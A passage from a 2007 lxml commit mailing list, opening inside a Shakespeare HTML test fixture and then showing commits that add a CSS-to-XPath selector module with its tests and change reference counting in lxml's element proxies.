Prithee be cheerful: know'st thou not, the duke
+ +
Hath banish'd me, his daughter?
+ +
+ +
ROSALIND
+
+
That he hath not.
+ +
+ +
CELIA
+ +
+ +
No, hath not? Rosalind lacks then the love
+ +
Which teacheth thee that thou and I am one:
+
Shall we be sunder'd? shall we part, sweet girl?
+ +
No: let my father seek another heir.
+ +
Therefore devise with me how we may fly,
+ +
Whither to go and what to bear with us;
+
And do not seek to take your change upon you,
+
To bear your griefs yourself and leave me out;
+ +
For, by this heaven, now at our sorrows pale,
+ +
Say what thou canst, I'll go along with thee.
+ +
+ +
ROSALIND
+
+ +
Why, whither shall we go?
+ +
+ +
CELIA
+ +
+
To seek my uncle in the forest of Arden.
+
+ +
ROSALIND
+ +
+ +
Alas, what danger will it be to us,
+ +
Maids as we are, to travel forth so far!
+
Beauty provoketh thieves sooner than gold.
+ +
+ +
CELIA
+ +
+
I'll put myself in poor and mean attire
+ +
And with a kind of umber smirch my face;
+
The like do you: so shall we pass along
+ +
And never stir assailants.
+ +
+ +
ROSALIND
+
+ +
Were it not better,
+ +
Because that I am more than common tall,
+ +
That I did suit me all points like a man?
+ +
A gallant curtle-axe upon my thigh,
+ +
A boar-spear in my hand; and--in my heart
+ +
Lie there what hidden woman's fear there will--
+ +
We'll have a swashing and a martial outside,
+ +
As many other mannish cowards have
+ +
That do outface it with their semblances.
+ +
+ +
CELIA
+ +
+ +
What shall I call thee when thou art a man?
+
+ +
ROSALIND
+ +
+
I'll have no worse a name than Jove's own page;
+ +
And therefore look you call me Ganymede.
+ +
But what will you be call'd?
+ +
+ +
CELIA
+ +
+ +
Something that hath a reference to my state
+
No longer Celia, but Aliena.
+ +
+ +
ROSALIND
+
+ +
But, cousin, what if we assay'd to steal
+ +
The clownish fool out of your father's court?
+ +
Would he not be a comfort to our travel?
+ +
+ +
CELIA
+ +
+ +
He'll go along o'er the wide world with me;
+ +
Leave me alone to woo him. Let's away,
+
And get our jewels and our wealth together,
+ +
Devise the fittest time and safest way
+ +
To hide us from pursuit that will be made
+ +
After my flight. Now go we in content
+ +
To liberty and not to banishment.
+
Exeunt
+ +
+ +
+
+
+ + + \ No newline at end of file Added: lxml/branch/html/src/lxml/html/tests/test_css.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_css.py Fri Jun 29 18:51:58 2007 @@ -0,0 +1,112 @@ +import unittest +from lxml.tests.common_imports import doctest +from lxml import html +from lxml.html import css +import os + +doc_fn = os.path.join(os.path.dirname(__file__), + 'css_shakespear.html') + +# Data borrowed from http://mootools.net/slickspeed/ + +class CSSTestCase(unittest.TestCase): + + selectors = [ + ('*', 252), + ('div:only-child', 22), # ? + ('div:contains(CELIA)', 243), + ('div:nth-child(even)', 106), + ('div:nth-child(2n)', 106), + ('div:nth-child(odd)', 137), + ('div:nth-child(2n+1)', 137), + ('div:nth-child(n)', 243), + ('div:last-child', 53), + ('div:first-child', 51), + ('div > div', 242), + ('div + div', 190), + ('div ~ div', 190), + ('body', 1), + ('body div', 243), + ('div', 243), + ('div div', 242), + ('div div div', 241), + ('div, div, div', 243), + ('div, a, span', 243), + ('.dialog', 51), + ('div.dialog', 51), + ('div .dialog', 51), + ('div.character, div.dialog', 99), + ('#speech5', 1), + ('div#speech5', 1), + ('div #speech5', 1), + ('div.scene div.dialog', 49), + ('div#scene1 div.dialog div', 142), + ('#scene1 #speech1', 1), + ('div[class]', 103), + ('div[class=dialog]', 50), + ('div[class^=dia]', 51), + ('div[class$=log]', 50), + ('div[class*=sce]', 1), + ('div[class|=dialog]', 50), # ? Seems right + ('div[class!=madeup]', 243), # ? Seems right + ('div[class~=dialog]', 51), # ? Seems right + ] + + def __init__(self, index): + self.index = index + unittest.TestCase.__init__(self) + + @classmethod + def all(cls): + for i in range(len(cls.selectors)): + yield cls(i) + + def runTest(self): + f = open(doc_fn, 'rb') + c = f.read() + f.close() + doc = html.HTML(c) + body = doc.xpath('//body')[0] + bad = [] + selector, count = self.selectors[self.index] + xpath = css.xpath(css.parse(selector)) + try: + results = body.xpath(xpath) + except Exception, e: + e.args = ("%s for xpath %r" % (e, xpath)) + raise + found = {} + for item in results: + if item in found: + assert 0, ( + "Element shows up multiple times: %r" % item) + found[item] = None + if isinstance(results, basestring): + assert 0, ( + "Got string result (%r), not element, for xpath %r" + % (results[:20], str(xpath))) + if len(results) != count: + #if self.shortDescription() == 'div.character, div.dialog': + # import pdb; pdb.set_trace() + assert 0, ( + "Did not get expected results (%s) instead %s for xpath %r" + % (count, len(results), str(xpath))) + + def shortDescription(self): + return self.selectors[self.index][0] + +def unique(s): + found = {} + result = [] + for item in s: + if item in found: + continue + found[item] = None + result.append(s) + return result + +def test_suite(): + suite = unittest.TestSuite() + suite.addTests([doctest.DocFileSuite('test_css.txt')]) + suite.addTests(list(CSSTestCase.all())) + return suite Added: lxml/branch/html/src/lxml/html/tests/test_css.txt ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_css.txt Fri Jun 29 18:51:58 2007 @@ -0,0 +1,110 @@ +A quick test of tokenizing: + + >>> from lxml.html.css import tokenize, parse + >>> def ptok(s): + ... for item in tokenize(s): + ... print repr(item) + >>> ptok('E > f[a~="y\\"x"]') + Symbol(u'E', 0) + Token(u'>', 2) + Symbol(u'f', 4) + Token(u'[', 5) + Symbol(u'a', 6) + Token(u'~=', 7) + String(u'y"x', 9) + Token(u']', 15) + +Then of parsing: + + >>> parse('div, td.foo, div.bar span') + Or([Element[div], Class[Element[td].foo], CombinedSelector[Class[Element[div].bar] Element[span]]]) + >>> parse('div > p') + CombinedSelector[Element[div] > Element[p]] + >>> parse('td:first') + Pseudo[Element[td]:first] + >>> parse('a[name]') + Attrib[Element[a][name]] + >>> parse('a[rel="include"]') + Attrib[Element[a][rel = String(u'include', 6)]] + >>> parse('a[hreflang |= \'en\']') + Attrib[Element[a][hreflang |= String(u'en', 14)]] + >>> parse('div:nth-child(10)') + Function[Element[div]:nth-child(10)] + >>> parse('div:nth-of-type(10)') + Function[Element[div]:nth-of-type(10)] + >>> parse('label:only') + Pseudo[Element[label]:only] + >>> parse('a:lang(fr)') + Function[Element[a]:lang(Element[fr])] + >>> parse('div:contains("foo")') + Function[Element[div]:contains(String(u'foo', 13))] + >>> parse('div#foobar') + Hash[Element[div]#foobar] + >>> parse('div:not(div.foo)') + Function[Element[div]:not(Class[Element[div].foo])] + >>> parse('td ~ th') + CombinedSelector[Element[td] ~ Element[th]] + +Now of translation: + + >>> def xpath(css): + ... print parse(css).xpath() + >>> xpath('*') + * + >>> xpath('E') + e + >>> xpath('E[foo]') + e[@foo] + >>> xpath('E[foo="bar"]') + e[@foo = 'bar'] + >>> xpath('E[foo~="bar"]') + e[contains(concat(' ', normalize-space(@foo), ' '), ' bar ')] + >>> xpath('E[foo^="bar"]') + e[starts-with(@foo, 'bar')] + >>> xpath('E[foo$="bar"]') + e[substring(@foo, string-length(@foo)-2) = 'bar'] + >>> xpath('E[foo*="bar"]') + e[contains(@foo, 'bar')] + >>> xpath('E[hreflang|="en"]') + e[@hreflang = 'en' or starts-with(@hreflang, 'en-')] + >>> #xpath('E:root') + >>> xpath('E:nth-child(1)') + */e[0] + >>> xpath('E:nth-last-child(1)') + */e[last() - 0] + >>> xpath('E:nth-of-type(1)') + */e[0] + >>> xpath('E:nth-last-of-type(1)') + */e[last() - 0] + >>> xpath('E:first-child') + */e[position() = 0] + >>> xpath('E:last-child') + */e[position() = last()] + >>> xpath('E:first-of-type') + */e[0] + >>> xpath('E:last-of-type') + e[last()] + >>> xpath('E:only-child') + e[count(..) = 1] + >>> xpath('E:only-of-type') + e[count(../node-name(.)) = 1] + >>> xpath('E:empty') + e[count(.) = 0 and string(.) = ''] + >>> xpath('E:contains("foo")') + e[contains(css:lower-case(string(.)), 'foo')] + >>> xpath('E.warning') + e[contains(concat(' ', normalize-space(@class), ' '), ' warning ')] + >>> xpath('E#myid') + e[@id='myid'] + >>> xpath('E:not(:contains("foo"))') + e[not(contains(css:lower-case(string(.)), 'foo'))] + >>> xpath('E F') + e/descendant::f + >>> xpath('E > F') + e/f + >>> xpath('E + F') + e/following-sibling::f[0] + >>> xpath('E ~ F') + e/following-sibling::f + >>> xpath('div#container p') + div[@id='container']/descendant::p From ianb at codespeak.net Fri Jun 29 18:52:18 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 29 Jun 2007 18:52:18 +0200 (CEST) Subject: [Lxml-checkins] r44622 - lxml/branch/html/src/lxml/html Message-ID: <20070629165218.EFE2680AE@code0.codespeak.net> Author: ianb Date: Fri Jun 29 18:52:18 2007 New Revision: 44622 Added: lxml/branch/html/src/lxml/html/css.py (contents, props changed) Log: css module to go with last commit Added: lxml/branch/html/src/lxml/html/css.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/css.py Fri Jun 29 18:52:18 2007 @@ -0,0 +1,801 @@ +import re +from lxml import etree + +class SelectorSyntaxError(Exception): + pass + +class ExpressionError(Exception): + pass + +class _UniToken(unicode): + def __new__(cls, contents, pos): + obj = unicode.__new__(cls, contents) + obj.pos = pos + return obj + + def __repr__(self): + return '%s(%s, %r)' % ( + self.__class__.__name__, + unicode.__repr__(self), + self.pos) + +class Symbol(_UniToken): + pass + +class String(_UniToken): + pass + +class Token(_UniToken): + pass + +############################################################ +## Parsing +############################################################ + +############################## +## Syntax objects: + +class Class(object): + """ + Represents selector.class_name + """ + + def __init__(self, selector, class_name): + self.selector = selector + self.class_name = class_name + + def __repr__(self): + return '%s[%r.%s]' % ( + self.__class__.__name__, + self.selector, + self.class_name) + + def xpath(self): + sel_xpath = self.selector.xpath() + sel_xpath.add_condition( + "contains(concat(' ', normalize-space(@class), ' '), %s)" % xpath_repr(' '+self.class_name+' ')) + return sel_xpath + +class Function(object): + """ + Represents selector:name(expr) + """ + + unsupported = [ + 'target', 'lang', 'enabled', 'disabled',] + + def __init__(self, selector, type, name, expr): + self.selector = selector + self.type = type + self.name = name + self.expr = expr + + def __repr__(self): + return '%s[%r%s%s(%r)]' % ( + self.__class__.__name__, + self.selector, + self.type, self.name, self.expr) + + def xpath(self): + sel_path = self.selector.xpath() + if self.name in self.unsupported: + raise ExpressionError( + "The psuedo-class %r is not supported" % self.name) + method = '_xpath_' + self.name.replace('-', '_') + if not hasattr(self, method): + raise ExpressionError( + "The psuedo-class %r is unknown" % self.name) + method = getattr(self, method) + return method(sel_path, self.expr) + + def _xpath_nth_child(self, xpath, expr, last=False): + if isinstance(expr, int): + return self._xpath_nth_child_simple(xpath, expr, last) + if not isinstance(expr, int): + a, b = parse_series(expr) + if not a: + # a=0 means nothing is returned... + xpath.add_condition('false()') + return xpath + if a == 1: + return self._xpath_nth_child_simple(xpath, expr, last) + if b > 0: + b_neg = str(-b) + else: + b_neg = '+%s' % (-b) + expr = '(position() %s) mod %s = 0' % (b_neg, a) + if b >= 0: + expr += ' and position() >= %s' % b + xpath.add_condition(expr) + return xpath + # FIXME: handle an+b, odd, even + # an+b means every-a, plus b, e.g., 2n+1 means odd + # 0n+b means b + # n+0 means a=1, i.e., all elements + # an means every a elements, i.e., 2n means even + # -n means -1n + # -1n+6 means elements 6 and previous + + def _xpath_nth_child_simple(self, xpath, expr, last=False): + if isinstance(expr, int): + expr -= 1 + if last: + expr = 'last() - %s' % expr + xpath = XPath('*/%s' % xpath) + xpath.add_index(expr) + return xpath + + def _xpath_nth_last_child(self, xpath, expr): + return self._xpath_nth_child(xpath, expr, last=True) + + def _xpath_nth_of_type(self, xpath, expr, last=False): + # Like nth-of-type, but only for *this* type + if isinstance(expr, int): + expr -= 1 + if last: + expr = 'last() - %s' % expr + xpath = XPath('*/%s' % xpath) + xpath.add_index(expr) + return xpath + else: + raise NotImplementedError + + def _xpath_nth_last_of_type(self, xpath, expr): + return self._xpath_nth_of_type(xpath, expr, last=True) + + def _xpath_contains(self, xpath, expr): + # text content, minus tags, must contain expr + if isinstance(expr, Element): + expr = expr._format_element() + xpath.add_condition('contains(css:lower-case(string(.)), %s)' + % xpath_repr(expr.lower())) + return xpath + + def _xpath_not(self, xpath, expr): + # everything for which not expr applies + expr = expr.xpath() + cond = expr.condition + # FIXME: should I do something about element_path? + xpath.add_condition('not(%s)' % cond) + return xpath + +def _make_lower_case(context, s): + return s.lower() + +etree.FunctionNamespace("css")['lower-case'] = _make_lower_case + +class Pseudo(object): + """ + Represents selector:ident + """ + + unsupported = ['indeterminate', 'first-line', 'first-letter', + 'selection', 'before', 'after', 'link', 'visited', + 'active', 'focus', 'hover'] + + def __init__(self, element, type, ident): + self.element = element + assert type in (':', '::') + self.type = type + self.ident = ident + + def __repr__(self): + return '%s[%r%s%s]' % ( + self.__class__.__name__, + self.element, + self.type, self.ident) + + def xpath(self): + el_xpath = self.element.xpath() + if self.ident in self.unsupported: + raise ExpressionError( + "The psuedo-class %r is unsupported" % self.ident) + method = '_xpath_' + self.ident.replace('-', '_') + if not hasattr(self, method): + raise ExpressionError( + "The psuedo-class %r is unknown" % self.ident) + method = getattr(self, method) + el_xpath = method(el_xpath) + return el_xpath + + def _xpath_checked(self, xpath): + xpath.add_condition("(@selected or @checked) and (node-name(.) = 'input' or node-name(.) = 'option')") + return xpath + + def _xpath_root(self, xpath): + # if this element is the root element + raise NotImplementedError + + def _xpath_first_child(self, xpath): + xpath = XPath('*/%s' % xpath) + xpath.add_condition('position() = 0') + return xpath + + def _xpath_last_child(self, xpath): + xpath = XPath('*/%s' % xpath) + xpath.add_condition('position() = last()') + return xpath + + def _xpath_first_of_type(self, xpath): + xpath = XPath('*/%s' % xpath) + xpath.add_index(0) + return xpath + + def _xpath_last_of_type(self, xpath): + xpath.add_index('last()') + return xpath + + def _xpath_only_child(self, xpath): + xpath.add_condition('count(..) = 1') + return xpath + + def _xpath_only_of_type(self, xpath): + # FIXME: I doubt this is right + xpath.add_condition('count(../node-name(.)) = 1') + return xpath + + def _xpath_empty(self, xpath): + xpath.add_condition("count(.) = 0 and string(.) = ''") + return xpath + +class Attrib(object): + """ + Represents selector[namespace|attrib operator value] + """ + + def __init__(self, selector, namespace, attrib, operator, value): + self.selector = selector + self.namespace = namespace + self.attrib = attrib + self.operator = operator + self.value = value + + def __repr__(self): + if self.operator == 'exists': + return '%s[%r[%s]]' % ( + self.__class__.__name__, + self.selector, + self._format_attrib()) + else: + return '%s[%r[%s %s %r]]' % ( + self.__class__.__name__, + self.selector, + self._format_attrib(), + self.operator, + self.value) + + def _format_attrib(self): + if self.namespace == '*': + return self.attrib + else: + return '%s|%s' % (self.namespace, self.attrib) + + def _xpath_attrib(self): + # FIXME: if attrib is *? + if self.namespace == '*': + return '@' + self.attrib + else: + return '@%s:%s' % (self.namespace, self.attrib) + + def xpath(self): + path = self.selector.xpath() + attrib = self._xpath_attrib() + value = self.value + if self.operator == 'exists': + assert not value + path.add_condition(attrib) + elif self.operator == '=': + path.add_condition('%s = %s' % (attrib, + xpath_repr(value))) + elif self.operator == '!=': + # FIXME: this seems like a weird hack... + if value: + path.add_condition('not(%s) or %s != %s' + % (attrib, attrib, xpath_repr(value))) + else: + path.add_condition('%s != %s' + % (attrib, xpath_repr(value))) + #path.add_condition('%s != %s' % (attrib, xpath_repr(value))) + elif self.operator == '~=': + path.add_condition("contains(concat(' ', normalize-space(%s), ' '), %s)" % (attrib, xpath_repr(' '+value+' '))) + elif self.operator == '|=': + # Weird, but true... + path.add_condition('%s = %s or starts-with(%s, %s)' % ( + attrib, xpath_repr(value), + attrib, xpath_repr(value + '-'))) + elif self.operator == '^=': + path.add_condition('starts-with(%s, %s)' % ( + attrib, xpath_repr(value))) + elif self.operator == '$=': + # Oddly there is a starts-with in XPath 1.0, but not ends-with + path.add_condition('substring(%s, string-length(%s)-%s) = %s' + % (attrib, attrib, len(value)-1, xpath_repr(value))) + elif self.operator == '*=': + path.add_condition('contains(%s, %s)' % ( + attrib, xpath_repr(value))) + else: + assert 0, ("Unknown operator: %r" % self.operator) + return path + +class Element(object): + """ + Represents namespace|element + """ + + def __init__(self, namespace, element): + self.namespace = namespace + self.element = element + + def __repr__(self): + return '%s[%s]' % ( + self.__class__.__name__, + self._format_element()) + + def _format_element(self): + if self.namespace == '*': + return self.element + else: + return '%s|%s' % (self.namespace, self.element) + + def xpath(self): + if self.namespace == '*': + return XPath(self.element.lower()) + else: + return XPath('%s:%s' % (self.namespace, self.element)) + +class Hash(object): + """ + Represents selector#id + """ + + def __init__(self, selector, id): + self.selector = selector + self.id = id + + def __repr__(self): + return '%s[%r#%s]' % ( + self.__class__.__name__, + self.selector, self.id) + + def xpath(self): + path = self.selector.xpath() + path.add_condition('@id=%s' % xpath_repr(self.id)) + return path + +class Or(object): + + def __init__(self, items): + self.items = items + def __repr__(self): + return '%s(%r)' % ( + self.__class__.__name__, + self.items) + + def xpath(self): + paths = [item.xpath() for item in self.items] + return XPathOr(paths) + +class CombinedSelector(object): + + _method_mapping = { + ' ': 'descendant', + '>': 'child', + '+': 'direct_adjacent', + '~': 'indirect_adjacent', + } + + def __init__(self, selector, combinator, subselector): + assert selector is not None + self.selector = selector + self.combinator = combinator + self.subselector = subselector + + def __repr__(self): + if self.combinator == ' ': + comb = '' + else: + comb = self.combinator + return '%s[%r %s %r]' % ( + self.__class__.__name__, + self.selector, + comb, + self.subselector) + + def xpath(self): + if self.combinator not in self._method_mapping: + raise ExpressionError( + "Unknown combinator: %r" % self.combinator) + method = '_xpath_' + self._method_mapping[self.combinator] + method = getattr(self, method) + path = self.selector.xpath() + return method(path, self.subselector) + + def _xpath_descendant(self, xpath, sub): + # when sub is a descendant in any way of xpath + return XPath('%s/descendant::%s' % (xpath, sub.xpath())) + + def _xpath_child(self, xpath, sub): + # when sub is an immediate child of xpath + return XPath(str(xpath) + '/' + str(sub.xpath())) + + def _xpath_direct_adjacent(self, xpath, sub): + # when sub immediately follows xpath + path = self._xpath_indirect_adjacent(xpath, sub) + path.add_index(0) + return path + + def _xpath_indirect_adjacent(self, xpath, sub): + # when sub comes somewhere after xpath as a sibling + return XPath('%s/following-sibling::%s' % ( + xpath, sub.xpath())) + + +############################## +## XPath objects: + +def xpath(css_expr, prefix='descendant-or-self::'): + if isinstance(css_expr, basestring): + css_expr = parse(css_expr) + expr = css_expr.xpath() + assert expr is not None, ( + "Got None for xpath expression from %s" % repr(css_expr)) + if isinstance(expr, XPathOr): + for item in expr.items: + item.element_path = prefix + item.element_path + else: + expr.element_path = prefix + expr.element_path + return str(expr) + +def run_xpath(doc, xpath): + return [el for el in doc.xpath(xpath) + if isinstance(el, etree.ElementBase)] + +def run_css(doc, css): + return run_xpath(doc, xpath(css)) + +class XPath(object): + + def __init__(self, element_path, condition=None): + self.element_path = element_path + self.condition = condition + + def __str__(self): + path = str(self.element_path) + if self.condition: + path += '[%s]' % self.condition + return path + + def __repr__(self): + return '%s[%s]' % ( + self.__class__.__name__, self) + + def add_condition(self, condition): + if self.condition: + self.condition = '%s and (%s)' % (self.condition, condition) + else: + self.condition = condition + + def add_index(self, index): + self.element_path = '%s[%s]' % (self.element_path, index) + +class XPathOr(XPath): + + """ + Represents on |'d expressions. Note that unfortunately it isn't + the union, it's the sum, so duplicate elements will appear. + """ + + def __init__(self, items): + for item in items: + assert item is not None + self.items = items + + def __str__(self): + return ' | '.join(map(str, self.items)) + + +def xpath_repr(s): + # FIXME: I don't think this is right + if isinstance(s, Element): + # This is probably a symbol that looks like an expression... + s = s._format_element() + return repr(str(s)) + +############################## +## Parsing functions + +def parse(string): + stream = TokenStream(tokenize(string)) + stream.source = string + try: + return parse_selector_group(stream) + except SelectorSyntaxError, e: + e.args = tuple(["%s at %s -> %s" % ( + e, stream.used, list(stream))]) + raise + +def parse_selector_group(stream): + result = [] + while 1: + result.append(parse_selector(stream)) + if stream.peek() == ',': + stream.next() + else: + break + if len(result) == 1: + return result[0] + else: + return Or(result) + +def parse_selector(stream): + result = parse_simple_selector(stream) + while 1: + peek = stream.peek() + if peek == ',' or peek == ')' or peek is None: + return result + if stream.peek() in ('+', '>', '~'): + # A combinator + combinator = stream.next() + else: + combinator = ' ' + next_selector = parse_simple_selector(stream) + result = CombinedSelector(result, combinator, next_selector) + return result + +def parse_simple_selector(stream): + peek = stream.peek() + if peek != '*' and not isinstance(peek, Symbol): + element = namespace = '*' + else: + next = stream.next() + if next != '*' and not isinstance(next, Symbol): + raise SelectorSyntaxError( + "Expected symbol, got %r" % next) + if stream.peek() == '|': + namespace = next + stream.next() + element = stream.next() + if element != '*' and not isinstance(next, Symbol): + raise SelectorSyntaxError( + "Expected symbol, got %r" % next) + else: + namespace = '*' + element = next + result = Element(namespace, element) + has_hash = False + while 1: + peek = stream.peek() + if peek == '#': + if has_hash: + # You can't have two hashes + # (FIXME: is there some more general rule I'm missing?) + break + stream.next() + result = Hash(result, stream.next()) + has_hash = True + continue + elif peek == '.': + stream.next() + result = Class(result, stream.next()) + continue + elif peek == '[': + stream.next() + result = parse_attrib(result, stream) + next = stream.next() + if not next == ']': + raise SelectorSyntaxError( + "] expected, got %r" % next) + continue + elif peek == ':' or peek == '::': + type = stream.next() + ident = stream.next() + if not isinstance(ident, Symbol): + raise SelectorSyntaxError( + "Expected symbol, got %r" % ident) + if stream.peek() == '(': + stream.next() + peek = stream.peek() + if isinstance(peek, String): + selector = stream.next() + elif isinstance(peek, Symbol) and is_int(peek): + selector = int(stream.next()) + else: + # FIXME: parse_simple_selector, or selector, or...? + selector = parse_simple_selector(stream) + next = stream.next() + if not next == ')': + raise SelectorSyntaxError( + "Expected ), got %r and %r" + % (next, selector)) + result = Function(result, type, ident, selector) + else: + result = Pseudo(result, type, ident) + continue + else: + break + # FIXME: not sure what "negation" is + return result + +def is_int(v): + try: + int(v) + except ValueError: + return False + else: + return True + +def parse_attrib(selector, stream): + attrib = stream.next() + if stream.peek() == '|': + namespace = attrib + stream.next() + attrib = stream.next() + else: + namespace = '*' + if stream.peek() == ']': + return Attrib(selector, namespace, attrib, 'exists', None) + op = stream.next() + if not op in ('^=', '$=', '*=', '=', '~=', '|=', '!='): + raise SelectorSyntaxError( + "Operator expected, got %r" % op) + value = stream.next() + if not isinstance(value, (Symbol, String)): + raise SelectorSyntaxError( + "Expected string or symbol, got %r" % value) + return Attrib(selector, namespace, attrib, op, value) + +def parse_series(s): + """ + Parses things like '1n+2', or 'an+b' generally, returning (a, b) + """ + if isinstance(s, Element): + s = s._format_element() + if isinstance(s, int): + # Happens when you just get a number + return (1, s) + if s == 'odd': + return (2, 1) + elif s == 'even': + return (2, 0) + if 'n' not in s: + # Just a b + return int(s) + a, b = s.split('n', 1) + if not a: + a = 1 + elif a == '-' or a == '+': + a = int(a+'1') + else: + a = int(a) + if not b: + b = 0 + elif b == '-' or b == '+': + b = int(b+'1') + else: + b = int(b) + return (a, b) + + +############################################################ +## Tokenizing +############################################################ + +_whitespace_re = re.compile(r'\s+') + +_comment_re = re.compile(r'/\*.*?\*/', re.S) + +_count_re = re.compile(r'[+-]?\d*n(?:[+-]\d+)?') + +def tokenize(s): + pos = 0 + s = _comment_re.sub('', s) + while 1: + match = _whitespace_re.match(s, pos=pos) + if match: + pos = match.end() + if pos >= len(s): + return + match = _count_re.match(s, pos=pos) + if match and match.group() != 'n': + sym = s[pos:match.end()] + yield Symbol(sym, pos) + pos = match.end() + continue + c = s[pos] + c2 = s[pos:pos+2] + if c2 in ('~=', '|=', '^=', '$=', '*=', '::', '!='): + yield Token(c2, pos) + pos += 2 + continue + if c in '>+~,.*=[]()|:#': + yield Token(c, pos) + pos += 1 + continue + if c == '"' or c == "'": + # Quoted string + old_pos = pos + sym, pos = tokenize_escaped_string(s, pos) + yield String(sym, old_pos) + continue + old_pos = pos + sym, pos = tokenize_symbol(s, pos) + yield Symbol(sym, old_pos) + continue + +def tokenize_escaped_string(s, pos): + quote = s[pos] + assert quote in ('"', "'") + pos = pos+1 + start = pos + while 1: + next = s.find(quote, pos) + if next == -1: + raise SelectorSyntaxError( + "Expected closing %s for string in: %r" + % (quote, s[start:])) + result = s[start:next] + try: + result = result.decode('unicode_escape') + except UnicodeDecodeError: + # Probably a hanging \ + pos = next+1 + else: + return result, next+1 + +_illegal_symbol = re.compile(r'[^\w\\-]', re.UNICODE) + +def tokenize_symbol(s, pos): + start = pos + match = _illegal_symbol.search(s, pos=pos) + if not match: + # Goes to end of s + return s[start:], len(s) + if match.start() == pos: + assert 0, ( + "Unexpected symbol: %r at %s" % (s[pos], pos)) + if not match: + result = s[start:] + pos = len(s) + else: + result = s[start:match.start()] + pos = match.start() + try: + result = result.decode('unicode_escape') + except UnicodeDecodeError, e: + raise SelectorSyntaxError( + "Bad symbol %r: %s" % (result, e)) + return result, pos + +class TokenStream(object): + + def __init__(self, tokens, source=None): + self.used = [] + self.tokens = iter(tokens) + self.source = source + self.peeked = None + self._peeking = False + + def next(self): + if self._peeking: + self._peeking = False + self.used.append(self.peeked) + return self.peeked + else: + try: + next = self.tokens.next() + self.used.append(next) + return next + except StopIteration: + return None + + def __iter__(self): + return iter(self.next, None) + + def peek(self): + if not self._peeking: + try: + self.peeked = self.tokens.next() + except StopIteration: + return None + self._peeking = True + return self.peeked From scoder at codespeak.net Fri Jun 29 18:53:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 18:53:12 +0200 (CEST) Subject: [Lxml-checkins] r44623 - lxml/trunk/src/lxml Message-ID: <20070629165312.C3B36810E@code0.codespeak.net> Author: scoder Date: Fri Jun 29 18:53:12 2007 New Revision: 44623 Modified: lxml/trunk/src/lxml/etree.pyx lxml/trunk/src/lxml/proxy.pxi lxml/trunk/src/lxml/python.pxd Log: new way to prevent deallocation crashes: count references from _Element to _Document twice, decref them only when deallocating or moving _Element proxies => _Document can no longer be freed in the same GC cycle as its _Elements, will always be freed afterwards Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Fri Jun 29 18:53:12 2007 @@ -243,8 +243,8 @@ #displayNode(self._c_doc, 0) #print self._c_doc, self._c_doc.dict is __GLOBAL_PARSER_CONTEXT._c_dict #print self._c_doc, canDeallocateChildNodes(self._c_doc) - #tree.xmlFreeDoc(c_doc) - _deallocDocument(self._c_doc) + tree.xmlFreeDoc(self._c_doc) + #_deallocDocument(self._c_doc) cdef getroot(self): cdef xmlNode* c_node Modified: lxml/trunk/src/lxml/proxy.pxi ============================================================================== --- lxml/trunk/src/lxml/proxy.pxi (original) +++ lxml/trunk/src/lxml/proxy.pxi Fri Jun 29 18:53:12 2007 @@ -27,6 +27,8 @@ #print "registering for:", proxy._c_node assert c_node._private is NULL, "double registering proxy!" c_node._private = proxy + # additional INCREF to make sure _Document is GC-ed LAST! + python.Py_INCREF(proxy._doc) cdef unregisterProxy(_Element proxy): """Unregister a proxy for the node it's proxying for. @@ -35,6 +37,7 @@ c_node = proxy._c_node assert c_node._private is proxy, "Tried to unregister unknown proxy" c_node._private = NULL + python.Py_DECREF(proxy._doc) ################################################################################ # temporarily make a node the root node of its document @@ -170,18 +173,18 @@ tree.END_FOR_EACH_ELEMENT_FROM(c_node) return 1 -cdef void _deallocDocument(xmlDoc* c_doc): - """We cannot rely on Python's GC to *always* dealloc the _Document *after* - all proxies it contains => traverse the document and mark all its proxies - as dead by deleting their xmlNode* reference. - """ - cdef xmlNode* c_node - c_node = c_doc.children - tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_doc, c_node, 1) - if c_node._private is not NULL: - (<_Element>c_node._private)._c_node = NULL - tree.END_FOR_EACH_ELEMENT_FROM(c_node) - tree.xmlFreeDoc(c_doc) +## cdef void _deallocDocument(xmlDoc* c_doc): +## """We cannot rely on Python's GC to *always* dealloc the _Document *after* +## all proxies it contains => traverse the document and mark all its proxies +## as dead by deleting their xmlNode* reference. +## """ +## cdef xmlNode* c_node +## c_node = c_doc.children +## tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_doc, c_node, 1) +## if c_node._private is not NULL: +## (<_Element>c_node._private)._c_node = NULL +## tree.END_FOR_EACH_ELEMENT_FROM(c_node) +## tree.xmlFreeDoc(c_doc) ################################################################################ # fix _Document references and namespaces when a node changes documents @@ -303,6 +306,8 @@ if c_element._private is not NULL: element = <_Element>c_element._private if element._doc is not doc: + python.Py_INCREF(doc) + python.Py_DECREF(element._doc) element._doc = doc if c_element is c_start_node: @@ -321,7 +326,11 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + python.Py_INCREF(doc) + python.Py_DECREF(element._doc) + element._doc = doc if c_element is c_start_node: break Modified: lxml/trunk/src/lxml/python.pxd ============================================================================== --- lxml/trunk/src/lxml/python.pxd (original) +++ lxml/trunk/src/lxml/python.pxd Fri Jun 29 18:53:12 2007 @@ -9,6 +9,7 @@ cdef int PY_SSIZE_T_MAX cdef void Py_INCREF(object o) + cdef void Py_DECREF(object o) cdef FILE* PyFile_AsFile(object p) cdef int PyFile_Check(object p) From ianb at codespeak.net Fri Jun 29 19:05:44 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 29 Jun 2007 19:05:44 +0200 (CEST) Subject: [Lxml-checkins] r44624 - in lxml/branch/html: . doc doc/html src/lxml src/lxml/tests src/lxml/tests/include tools Message-ID: <20070629170544.7AA5F811D@code0.codespeak.net> Author: ianb Date: Fri Jun 29 19:05:43 2007 New Revision: 44624 Added: lxml/branch/html/src/lxml/tests/include/ - copied from r44623, lxml/trunk/src/lxml/tests/include/ lxml/branch/html/src/lxml/tests/include/test_xinclude.xml - copied unchanged from r44623, lxml/trunk/src/lxml/tests/include/test_xinclude.xml 